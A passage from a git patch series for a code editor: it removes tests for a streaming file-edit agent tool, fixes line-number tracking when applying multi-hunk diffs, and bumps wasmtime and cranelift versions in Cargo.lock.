TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello\nworld\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - sender.send_full(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit", - "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "HELLO\nWORLD\n"); - } - - // Verifies that after streaming_edit_file_tool edits a file, the action log - // reports changed buffers so that the Accept All / Reject All review UI appears. - #[gpui::test] - async fn test_streaming_edit_file_tool_registers_changed_buffers(cx: &mut TestAppContext) { - let (tool, _project, action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let (event_stream, _rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit lines".to_string(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }]), - }), - event_stream, - cx, - ) - }); - - let result = task.await; - assert!(result.is_ok(), "edit should succeed: {:?}", result.err()); - - cx.run_until_parked(); - - let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); - assert!( - !changed.is_empty(), - "action_log.changed_buffers() should be non-empty after streaming edit, - but no changed buffers were found - Accept All / Reject All will not appear" - ); - } - - // Same test but for Write mode (overwrite entire file). - #[gpui::test] - async fn test_streaming_edit_file_tool_write_mode_registers_changed_buffers( - cx: &mut TestAppContext, - ) { - let (tool, _project, action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "original content"})).await; - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let (event_stream, _rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Overwrite file".to_string(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Write, - content: Some("completely new content".into()), - edits: None, - }), - event_stream, - cx, - ) - }); - - let result = task.await; - assert!(result.is_ok(), "write should succeed: {:?}", result.err()); - - cx.run_until_parked(); - - let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); - assert!( - !changed.is_empty(), - "action_log.changed_buffers() should be non-empty after streaming write, \ - but no changed buffers were found \u{2014} Accept All / Reject All will not appear" - ); - } - - #[gpui::test] - async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode( - cx: &mut TestAppContext, - ) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "old_content"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "write" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "write", - "content": "new_content" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "write", - "content": "new_content", - "path": "root" - })); - cx.run_until_parked(); - - // Send final. - sender.send_full(json!({ - "display_description": "Overwrite file", - "mode": "write", - "content": "new_content", - "path": "root/file.txt" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "new_content"); - } - - #[gpui::test] - async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode( - cx: &mut TestAppContext, - ) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "old_content"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "edit" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "edit", - "edits": [{"old_text": "old_content"}] - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "edit", - "edits": [{"old_text": "old_content", "new_text": "new_content"}] - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "edit", - "edits": [{"old_text": "old_content", "new_text": "new_content"}], - "path": "root" - })); - cx.run_until_parked(); - - // Send final. - sender.send_full(json!({ - "display_description": "Overwrite file", - "mode": "edit", - "edits": [{"old_text": "old_content", "new_text": "new_content"}], - "path": "root/file.txt" - })); - cx.run_until_parked(); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "new_content"); - } - - #[gpui::test] - async fn test_streaming_edit_partial_last_line(cx: &mut TestAppContext) { - let file_content = indoc::indoc! {r#" - fn on_query_change(&mut self, cx: &mut Context) { - self.filter(cx); - } - - - - fn render_search(&self, cx: &mut Context) -> Div { - div() - } - "#} - .to_string(); - - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.rs": file_content})).await; - - // The model sends old_text with a PARTIAL last line. - let old_text = "}\n\n\n\nfn render_search"; - let new_text = "}\n\nfn render_search"; - - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_full(json!({ - "display_description": "Remove extra blank lines", - "path": "root/file.rs", - "mode": "edit", - "edits": [{"old_text": old_text, "new_text": new_text}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text: final_text, - .. - } = result.unwrap() - else { - panic!("expected success"); - }; - - // The edit should reduce 3 blank lines to 1 blank line before - // fn render_search, without duplicating the function signature. - let expected = file_content.replace("}\n\n\n\nfn render_search", "}\n\nfn render_search"); - pretty_assertions::assert_eq!( - final_text, - expected, - "Edit should only remove blank lines before render_search" - ); - } - - #[gpui::test] - async fn test_streaming_edit_preserves_blank_line_after_trailing_newline_replacement( - cx: &mut TestAppContext, - ) { - let file_content = "before\ntarget\n\nafter\n"; - let old_text = "target\n"; - let new_text = "one\ntwo\ntarget\n"; - let expected = "before\none\ntwo\ntarget\n\nafter\n"; - - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.rs": file_content})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_full(json!({ - "display_description": "description", - "path": "root/file.rs", - "mode": "edit", - "edits": [{"old_text": old_text, "new_text": new_text}] - })); - - let result = task.await; - - let StreamingEditFileToolOutput::Success { - new_text: final_text, - .. - } = result.unwrap() - else { - panic!("expected success"); - }; - - pretty_assertions::assert_eq!( - final_text, - expected, - "Edit should preserve a single blank line before test_after" - ); - } - - #[gpui::test] - async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) { - let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - // Create a new file via the streaming edit file tool - let (event_stream, _rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Create new file".into(), - path: "root/dir/new_file.txt".into(), - mode: StreamingEditFileMode::Write, - content: Some("Hello, World!".into()), - edits: None, - }), - event_stream, - cx, - ) - }); - let result = task.await; - assert!(result.is_ok(), "create should succeed: {:?}", result.err()); - cx.run_until_parked(); - - assert!( - fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, - "file should exist after creation" - ); - - // Reject all edits — this should delete the newly created file - let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); - assert!( - !changed.is_empty(), - "action_log should track the created file as changed" - ); - - action_log - .update(cx, |log, cx| log.reject_all_edits(None, cx)) - .await; - cx.run_until_parked(); - - assert!( - !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, - "file should be deleted after rejecting creation, but an empty file was left behind" - ); - } - - #[test] - fn test_input_deserializes_double_encoded_fields() { - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "\"edit\"", - "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" - })) - .expect("input should deserialize"); - - assert!(matches!(input.mode, StreamingEditFileMode::Edit)); - let edits = input.edits.expect("edits should deserialize"); - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "hello\nworld"); - assert_eq!(edits[0].new_text, "HELLO\nWORLD"); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "\"edit\"" - })) - .expect("input should deserialize"); - assert!(input.edits.is_none()); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "\"edit\"", - "edits": null - })) - .expect("input should deserialize"); - assert!(input.edits.is_none()); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "\"edit\"", - "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" - })) - .expect("input should deserialize"); - - assert!(matches!(input.mode, Some(StreamingEditFileMode::Edit))); - let edits = input.edits.expect("edits should deserialize"); - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text.as_deref(), Some("hello\nworld")); - assert_eq!(edits[0].new_text.as_deref(), Some("HELLO\nWORLD")); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt" - })) - .expect("input should deserialize"); - assert!(input.mode.is_none()); - assert!(input.edits.is_none()); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": null, - "edits": null - })) - .expect("input should deserialize"); - assert!(input.mode.is_none()); - assert!(input.edits.is_none()); - } - - async fn setup_test_with_fs( - cx: &mut TestAppContext, - fs: Arc, - worktree_paths: &[&std::path::Path], - ) -> ( - Arc, - Entity, - Entity, - Arc, - Entity, - ) { - let project = Project::test(fs.clone(), worktree_paths.iter().copied(), cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - action_log.clone(), - language_registry, - )); - (tool, project, action_log, fs, thread) - } - - async fn setup_test( - cx: &mut TestAppContext, - initial_tree: serde_json::Value, - ) -> ( - Arc, - Entity, - Entity, - Arc, - Entity, - ) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", initial_tree).await; - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await - } - - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - SettingsStore::update_global(cx, |store: &mut SettingsStore, cx| { - store.update_user_settings(cx, |settings| { - settings - .project - .all_languages - .defaults - .ensure_final_newline_on_save = Some(false); - }); - }); - }); - } -} From 2532f204fd9430b35b93cf4ea5606554e22699e2 Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Mon, 4 May 2026 13:01:12 +0300 Subject: [PATCH 152/231] zeta_prompt: Fix multy-hunk diff application (#55613) Release Notes: - N/A or Added/Fixed/Improved ... --- crates/zeta_prompt/src/udiff.rs | 58 +++++++++++++++++++++++++++++++-- 1 file changed, 56 insertions(+), 2 deletions(-) diff --git a/crates/zeta_prompt/src/udiff.rs b/crates/zeta_prompt/src/udiff.rs index ab0837b9f54ac0..eee1e65931c280 100644 --- a/crates/zeta_prompt/src/udiff.rs +++ b/crates/zeta_prompt/src/udiff.rs @@ -415,6 +415,7 @@ pub fn apply_diff_to_string_with_hunk_offset( let mut text = text.to_string(); let mut first_hunk_offset = None; + let mut line_delta = 0i64; while let Some(event) = diff.next().context("Failed to parse diff")? { match event { @@ -424,9 +425,12 @@ pub fn apply_diff_to_string_with_hunk_offset( status: _, } => { let candidates = find_context_candidates(&text, &mut hunk); + let adjusted_start_line = hunk + .start_line + .and_then(|start_line| u32::try_from(start_line as i64 + line_delta).ok()); let hunk_offset = - disambiguate_by_line_number(&candidates, hunk.start_line, &|offset| { + disambiguate_by_line_number(&candidates, adjusted_start_line, &|offset| { text[..offset].matches('\n').count() as u32 }) .ok_or_else(|| anyhow!("couldn't resolve hunk"))?; @@ -435,12 +439,19 @@ pub fn apply_diff_to_string_with_hunk_offset( first_hunk_offset = Some(hunk_offset); } + let mut hunk_line_delta = 0i64; for edit in hunk.edits.iter().rev() { let range = (hunk_offset + edit.range.start)..(hunk_offset + edit.range.end); + let deleted_lines = text[range.clone()].matches('\n').count() as i64; + let inserted_lines = edit.text.matches('\n').count() as i64; text.replace_range(range, &edit.text); + hunk_line_delta += inserted_lines - deleted_lines; } + line_delta += hunk_line_delta; + } + DiffEvent::FileEnd { .. } => { + line_delta = 0; } - DiffEvent::FileEnd { .. } => {} } } @@ -1315,6 +1326,49 @@ mod tests { assert_eq!(result, "hello\nworld"); } + #[test] + fn test_apply_diff_to_string_adjusts_line_numbers_after_prior_hunks() { + let text = "first\nremove first\nfirst\nsame\nremove\nsame\nsame\nremove\nsame\n"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,2 @@ + first + -remove first + first + @@ -4,3 +3,2 @@ + same + -remove + same + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "first\nfirst\nsame\nsame\nsame\nremove\nsame\n"); + } + + #[test] + fn test_apply_diff_to_string_adjusts_line_numbers_after_prior_insertion_hunks() { + let text = "first\nfirst\nsame\nremove\nsame\nsame\nremove\nsame\n"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,2 +1,3 @@ + first + +inserted + first + @@ -6,3 +7,2 @@ + same + -remove + same + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!( + result, + "first\ninserted\nfirst\nsame\nremove\nsame\nsame\nsame\n" + ); + } + #[test] fn test_find_context_candidates_no_false_positive_mid_text() { // The stripped fallback must only match at the end of text, not in From 51d56377924aa7d9e69dfc806e2096ae87dba016 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Mon, 4 May 2026 12:14:25 +0200 Subject: [PATCH 153/231] Update wasmtime to 36.0.8 (#55611) Pulls in latest cranelift and wasmtime to address security and bug fixes (to hopefully address some panics on windows in wasmtime) Release Notes: - N/A --- Cargo.lock | 156 ++++++++++++++++++++++++++--------------------------- 1 file changed, 78 insertions(+), 78 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 406d9f450bd6d8..1dde4ac88509ad 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -3944,36 +3944,36 @@ dependencies = [ [[package]] name = "cranelift-assembler-x64" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c8056d63fef9a6f88a1e7aae52bb08fcf48de8866d514c0dc52feb15975f5db5" +checksum = "cb1ffe339f197d6645b4d3037edf67c13cd3aa8871f29c2c9c046c729c1b9a17" dependencies = [ "cranelift-assembler-x64-meta", ] [[package]] name = "cranelift-assembler-x64-meta" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "57d063b40884a0d733223a45c5de1155395af4393cf7f900d5be8e2cbc094015" +checksum = "1e81a21df73d1b12ed19eba481c08de8891e179e1870ed28d6e397f7746108f5" dependencies = [ "cranelift-srcgen", ] [[package]] name = "cranelift-bforest" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c3add2881bae2d55cd7162906988dd70053cb7ece865ad793a6754b04d47df6" +checksum = "3cf917d0180c15c945c13c8dde615d32a015769513b29158f728311d85a8f80d" dependencies = [ "cranelift-entity", ] [[package]] name = "cranelift-bitset" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dd73e32bc1ea4bddc4c770760c66fa24b2890991b0561af554219e603fcd7c34" +checksum = "a6f4e1af2df00798c2895d228bb53d65c5aa09acace8525096f0b53830ffe42c" dependencies = [ "serde", "serde_derive", @@ -3981,9 +3981,9 @@ dependencies = [ [[package]] name = "cranelift-codegen" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e1da85f2636fe28244848861d1ed0f8dccdc6e98fc5db31aa5eb8878e7ff617" +checksum = "4e3a5d7300e4b44933dcf2947399945abe3f30f92c789b496ad72949e3ee15a6" dependencies = [ "bumpalo", "cranelift-assembler-x64", @@ -4011,9 +4011,9 @@ dependencies = [ [[package]] name = "cranelift-codegen-meta" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee3c8aba9d89832df27364b2e79dc2fe288daf4bd6c7347829e7f3f258ea5650" +checksum = "becdb5c3111800d7f8e666fe5f35693bfc77de4401bfcaea19815caf7c482fb9" dependencies = [ "cranelift-assembler-x64-meta", "cranelift-codegen-shared", @@ -4024,24 +4024,24 @@ dependencies = [ [[package]] name = "cranelift-codegen-shared" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac9a9b09fe107fef6377caed20614586124184cffccb73611312ceb922a917e6" +checksum = "d8fa77efffa12934971f757e154b16dd5e369a7f388a0f3adff74aadfd4c5a1d" [[package]] name = "cranelift-control" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "50aef001c7ad250d5fdda2c7481cbfcabe6435c66106adf5760dcb9fb9a8ede4" +checksum = "62441d3aae3372381e03a121880482158ce90ca3bc2a56607cc122ee07536fe4" dependencies = [ "arbitrary", ] [[package]] name = "cranelift-entity" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf3c84656a010df2b5afaedcbbbd94f1efe175b55e29864df7b99e64bfa40d56" +checksum = "7bdc9832a010e0d411439aa016e1664dd23ca5c8953bf26b90fe34ad4b76822d" dependencies = [ "cranelift-bitset", "serde", @@ -4050,9 +4050,9 @@ dependencies = [ [[package]] name = "cranelift-frontend" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6aa1d2006915cddb63705db46dcfb8637fe08f91d26fbe59680d7257ec39d609" +checksum = "9530b689b7c3accdbb32263ca318e19ab3bcf616d3a160c8456537c99b4c565b" dependencies = [ "cranelift-codegen", "log", @@ -4062,15 +4062,15 @@ dependencies = [ [[package]] name = "cranelift-isle" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e4fecbcbb81273f9aff4559e26fc341f42663da420cca5ac84b34e74e9267e0" +checksum = "3fcd3258a4d87376f2681c72269a42009286a3d3707b2af4024ba5b3750ad477" [[package]] name = "cranelift-native" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "976a3d85f197a56ae34ee4d5a5e469855ac52804a09a513d0562d425da0ff56e" +checksum = "642c5703a22b58abccbf46f46c0dae65f0535bbe725beec70527a1ffcbbc1d34" dependencies = [ "cranelift-codegen", "libc", @@ -4079,9 +4079,9 @@ dependencies = [ [[package]] name = "cranelift-srcgen" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37fbd4aefce642145491ff862d2054a71b63d2d97b8dd1e280c9fdaf399598b7" +checksum = "d200dcd5a37de108ec1329e0ba924e2badd2c0ef2343c338310135159ae454e2" [[package]] name = "crash-context" @@ -8583,7 +8583,7 @@ dependencies = [ "libc", "percent-encoding", "pin-project-lite", - "socket2 0.6.1", + "socket2 0.5.10", "tokio", "tower-service", "tracing", @@ -8601,7 +8601,7 @@ dependencies = [ "js-sys", "log", "wasm-bindgen", - "windows-core 0.62.2", + "windows-core 0.56.0", ] [[package]] @@ -13710,7 +13710,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "22505a5c94da8e3b7c2996394d1c933236c4d743e81a410bcca4e6989fc066a4" dependencies = [ "bytes 1.11.1", - "heck 0.5.0", + "heck 0.4.1", "itertools 0.11.0", "log", "multimap", @@ -13860,9 +13860,9 @@ checksum = "bd348ff538bc9caeda7ee8cad2d1d48236a1f443c1fa3913c6a02fe0043b1dd3" [[package]] name = "pulley-interpreter" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a078b4bdfd275fadeefc4f9ae3675ee5af302e69497da439956dd05257858970" +checksum = "35eaba3163b9faf1d707f0704a7370bfdbe73622c766acdaf1fa4addb87510de" dependencies = [ "cranelift-bitset", "log", @@ -13872,9 +13872,9 @@ dependencies = [ [[package]] name = "pulley-macros" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9dac91999883fd00b900eb5377be403c5cb8b93e10efcb571bf66454c2d9f231" +checksum = "ac294897a29ce07919714f9f25c11a819d75759d47eb9f3273845ffea5a5760d" dependencies = [ "proc-macro2", "quote", @@ -13977,7 +13977,7 @@ dependencies = [ "quinn-udp", "rustc-hash 2.1.1", "rustls 0.23.33", - "socket2 0.6.1", + "socket2 0.5.10", "thiserror 2.0.17", "tokio", "tracing", @@ -14014,7 +14014,7 @@ dependencies = [ "cfg_aliases 0.2.1", "libc", "once_cell", - "socket2 0.6.1", + "socket2 0.5.10", "tracing", "windows-sys 0.60.2", ] @@ -16527,7 +16527,7 @@ version = "0.8.9" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c1c97747dbf44bb1ca44a561ece23508e99cb592e862f22222dcf42f51d1e451" dependencies = [ - "heck 0.5.0", + "heck 0.4.1", "proc-macro2", "quote", "syn 2.0.117", @@ -19919,9 +19919,9 @@ dependencies = [ [[package]] name = "wasmtime" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b80d5ba38b9b00f60a0665e07dde38e91d884d4a78cd61d777c8cf081a1267c1" +checksum = "2060d93be880840d764ab537464b916e22c07758ac5d43e5f07cc86fec6d1bec" dependencies = [ "addr2line", "anyhow", @@ -19980,9 +19980,9 @@ dependencies = [ [[package]] name = "wasmtime-environ" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "44a45d60dea98308decb71a9f7bb35a629696d1fbf7127dbfde42cbc64b8fa33" +checksum = "902f991ca8c2e5abc03119eb5d7f7f57da1b7c2123addb8214b49c188737711e" dependencies = [ "anyhow", "cpp_demangle", @@ -20007,9 +20007,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-asm-macros" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dd014b4001b6da03d79062d9ad5ec98fa62e34d50e30e46298545282cc2957e4" +checksum = "b02cec619b54ce7652d1d7676718a42ccf5f16b2fb23c27cd6e3c307bc93907a" dependencies = [ "cfg-if", ] @@ -20026,9 +20026,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-component-macro" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0f2942aa5d44b02061e0c6ab71b23090cf3b300b4519e3b80776ac38edde2e65" +checksum = "fad82a87bc24b6014c5271e1558e466fd029dcc80896f143b3693394a162f3be" dependencies = [ "anyhow", "proc-macro2", @@ -20041,15 +20041,15 @@ dependencies = [ [[package]] name = "wasmtime-internal-component-util" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bcb6f974fe739e98034b7e6ec6feb2ab399f4cde7207675f26138bd9a1d65720" +checksum = "6bc24aba0bfd3d39fa8f0012835bc4d4efc75b1350b5e519181319eb8bb306b2" [[package]] name = "wasmtime-internal-cranelift" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4047020866a80aa943e41133e607020e17562126cf81533362275272098a22b1" +checksum = "54eb7fc20c8692dc96148365d7a00a1b79fee810833c75bdf8ec073a46e4721a" dependencies = [ "anyhow", "cfg-if", @@ -20074,9 +20074,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-fiber" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7cd172b622993bb8f834f6ca3b7683dfdba72b12db0527824850fdec17c89e5a" +checksum = "30708e122dcc1e175c66345c209c01752ca0cd20c9021721b6f56968342e9dbe" dependencies = [ "anyhow", "cc", @@ -20090,9 +20090,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-jit-debug" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1287e310fef4c8759a6b5caa0d44eff9a03ebcd6c273729cc39ce3e321a9e26a" +checksum = "1eeaab071a646d9ae205266adf186c63fa6d077d36b0b33628dd6c3d321d3195" dependencies = [ "cc", "wasmtime-internal-versioned-export-macros", @@ -20100,9 +20100,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-jit-icache-coherence" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c02bca30ef670a31496d742d9facdbd0228debe766b1e9541655c0530ff5c953" +checksum = "09979561e6e4a17bf55722463b066ccb968f010ac6ec5d647e4dff19eddbb19e" dependencies = [ "anyhow", "cfg-if", @@ -20112,24 +20112,24 @@ dependencies = [ [[package]] name = "wasmtime-internal-math" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fd3a1f51a037ae2c048f0d76d36e27f0d22276295496c44f16a251f24690e003" +checksum = "9193eb852e5c68aeb95a5ea7538c2bec503023169a0b24430224b4f1ded24988" dependencies = [ "libm", ] [[package]] name = "wasmtime-internal-slab" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ba6171aac3d66e4d69e50080bb6bc5205de2283513984a4118a93cb66dc02994" +checksum = "289bfa4fbb43f406f36166737f1f25522c215ef2ef11f98423089a6a7590a3d1" [[package]] name = "wasmtime-internal-unwinder" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3fd1bc1783391a02176fb687159b1779fc10b71d5350adf09c1f3aa8442a02cc" +checksum = "4e748c970993865d9bf474465c3f10f96e541c472bc8f7ec0b031779f4ac29c6" dependencies = [ "anyhow", "cfg-if", @@ -20140,9 +20140,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-versioned-export-macros" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8097e2c8ca02ed65d31dda111faa0888ffbf28dc3ee74355e283118a8d293eb0" +checksum = "e97e07438cb8b50df3bc9659c56757830a15235c94268dbbd54186524fd4ed84" dependencies = [ "proc-macro2", "quote", @@ -20151,9 +20151,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-winch" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6a8cb36b61fbcff2c8bcd14f9f2651a6e52b019d0d329324620d7bc971b2b235" +checksum = "107aa0c3f71cc590c786d6d6e09893558b383f4d78107b864a9fd978929d0244" dependencies = [ "anyhow", "cranelift-codegen", @@ -20168,9 +20168,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-wit-bindgen" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff555cfb71577028616d65c00221c7fe6eef45a9ebb96fc6d34d4a41fa1de191" +checksum = "eeb3d8e4efdaae10aa01264e9946bba507e53707125dd0aa8584b5e13229a3c0" dependencies = [ "anyhow", "bitflags 2.10.0", @@ -20181,9 +20181,9 @@ dependencies = [ [[package]] name = "wasmtime-wasi" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c3c2e99fbaa0c26b4680e0c9af07e3f7b25f5fbc1ad97dd34067980bd027d3e5" +checksum = "86fffc455304d2750ea2456394cdf6513d8771eb5b256876685b8bb9413bfb0e" dependencies = [ "anyhow", "async-trait", @@ -20212,9 +20212,9 @@ dependencies = [ [[package]] name = "wasmtime-wasi-io" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "de2dc367052562c228ce51ee4426330840433c29c0ea3349eca5ddeb475ecdb9" +checksum = 